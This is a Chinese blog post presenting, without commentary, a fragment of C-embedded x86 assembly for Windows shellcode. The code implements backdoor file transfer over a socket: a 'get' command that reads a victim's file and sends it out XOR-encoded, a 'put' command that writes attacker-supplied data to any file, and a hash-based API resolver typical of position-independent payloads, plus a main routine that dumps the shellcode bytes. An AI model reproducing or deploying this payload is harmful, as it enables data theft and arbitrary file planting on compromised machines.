Chinaunix首页 | 论坛 | 博客
  • 博客访问: 1202831
  • 博文数量: 272
  • 博客积分: 3899
  • 博客等级: 中校
  • 技术积分: 4734
  • 用 户 组: 普通用户
  • 注册时间: 2012-06-15 14:53
文章分类

全部博文(272)

文章存档

2012年(272)

分类: 服务器与存储

2012-06-26 13:21:08


点击(此处)折叠或打开

  1. get_file:
  2. //int 3
  3. mov byte ptr [esi+_sbuf+eax-1], 0
  4. lea edx, [esi+_sbuf+4] ; "get " filename
  5. xor eax, eax
  6. push eax
  7. push eax
  8. push 3 ; OPEN_EXISTING
  9. push eax ; lap
  10. push eax
  11. push 0x02000000 ; MAXIMUM_ALLOWED
  12. push edx ; filename
  13. call dword ptr [esi+_CreateFileA]
  14. //---- 判断文件打开是否成功-------
  15. inc eax
  16. test eax, eax
  17. jz k1
  18. dec eax
  19. //---------------------------------
  20. mov [esi+_hout0], eax
  21. transfer:
  22. push 0 ; null or &lap
  23. lea edx, [esi+_cnt]
  24. push edx ; read size actualy
  25. push 0x40 ; read size
  26. lea edx, [esi+_pbuf]
  27. push edx
  28. push [esi+_hout0]
  29. call dword ptr [esi+_ReadFile]
  30. mov ecx, [esi+_cnt]
  31. jecxz transfer_finish ; None to read
  32. lea edx, [esi+_pbuf]
  33. call xor_data
  34. push 0
  35. push [esi+_cnt]
  36. lea edx, [esi+_pbuf]
  37. push edx
  38. push [esi+_hsck]
  39. call dword ptr [esi+_send]
  40. jmp transfer
  41. transfer_finish:
  42. push [esi+_hout0]
  43. call dword ptr [esi+_CloseHandle]
  44. jmp k1
  45. put_file:
  46. //int 3
  47. mov byte ptr [esi+_sbuf+eax-1], 0
  48. lea edx, [esi+_sbuf+4] ; filename after "put "
  49. xor eax, eax
  50. push eax
  51. push eax
  52. push 2 ; CREATE_ALWAYS
  53. push eax ; lap
  54. push eax
  55. push 0x02000000 ; MAXIMUM_ALLOWED
  56. push edx ; filename
  57. call dword ptr [esi+_CreateFileA]
  58. //---- 判断文件创建是否成功-------
  59. //inc eax
  60. //test eax, eax
  61. //jz k1
  62. //dec eax
  63. //--------------------------------
  64. mov [esi+_hout0], eax
  65. upload:
  66. push 0
  67. push 0x40
  68. lea edx, [esi+_pbuf]
  69. push edx
  70. push [esi+_hsck]
  71. call dword ptr [esi+_recv] // recv(_hsck, _pbuf, 64, 0);
  72. //-----------------------------
  73. cmp dword ptr [esi+_pbuf], 21444E45h // 判断结束字符串END!
  74. jz upload_finish
  75. //-----------------------------
  76. lea edx, [esi+_pbuf]
  77. push eax
  78. pop ecx
  79. call xor_data // xor_data(_pbuf, len);
  80. push 0
  81. lea edx, [esi+_cnt]
  82. push edx
  83. push eax
  84. lea edx, [esi+_pbuf]
  85. push edx
  86. push [esi+_hout0]
  87. call dword ptr [esi+_WriteFile] // WriteFile(_hout0, _pbuf, len, _cnt, 0);
  88. //push 0
  89. //push esp
  90. //push 4004667Fh
  91. //push [esi+_hsck]
  92. //call dword ptr [esi+_ioctlsocket] // ioctlsocket(_hsck, FIONREAD, &i); i = 0
  93. //pop ecx
  94. //jecxz upload_finish
  95. jmp upload
  96. upload_finish:
  97. //int 3
  98. push [esi+_hout0]
  99. call dword ptr [esi+_CloseHandle] // CloseHandle(_hout0);
  100. mov byte ptr [esi+_sbuf], 0x0a
  101. push 1
  102. pop eax
  103. jmp restore
  104. xor_data:
  105. dec edx
  106. xor_work:
  107. xor byte ptr [edx+ecx], Xor_key
  108. loop xor_work
  109. ret
  110. find_hashfunc_addr:
  111. push ecx
  112. push esi
  113. mov esi, [ebp+3Ch] ; e_lfanew
  114. mov esi, [esi+ebp+78h] ; ExportDirectory RVA
  115. add esi, ebp ; rva2va
  116. push esi
  117. mov esi, [esi+20h] ; AddressOfNames RVA
  118. add esi, ebp ; rva2va
  119. xor ecx, ecx
  120. dec ecx
  121. find_start:
  122. inc ecx
  123. lodsd
  124. add eax, ebp
  125. xor ebx, ebx
  126. hash_loop:
  127. movsx edx, byte ptr [eax]
  128. cmp dl, dh
  129. jz short find_addr
  130. ror ebx, 7 ; hash
  131. add ebx, edx
  132. inc eax
  133. jmp short hash_loop
  134. find_addr:
  135. cmp ebx, [edi] ; compare to hash
  136. jnz short find_start
  137. pop esi ; ExportDirectory
  138. mov ebx, [esi+24h] ; AddressOfNameOrdinals RVA
  139. add ebx, ebp ; rva2va
  140. mov cx, [ebx+ecx*2] ; FunctionOrdinal
  141. mov ebx, [esi+1Ch] ; AddressOfFunctions RVA
  142. add ebx, ebp ; rva2va
  143. mov eax, [ebx+ecx*4] ; FunctionAddress RVA
  144. add eax, ebp ; rva2va
  145. stosd ; function address save to [edi]
  146. pop esi
  147. pop ecx
  148. retn
  149. locate_addr:
  150. call func_start
  151. PROC_END //C macro to end proc
  152. }
  153. }
  154. int main(int argc, char *argv[])
  155. {
  156. unsigned char Buff[2048];
  157. GetShellCode();
  158. PrintSc(sh_Buff, sh_Len);
  159. //PrintSc(Buff, sizeof(Buff));
  160. return 1;
  161. }

阅读(1184) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~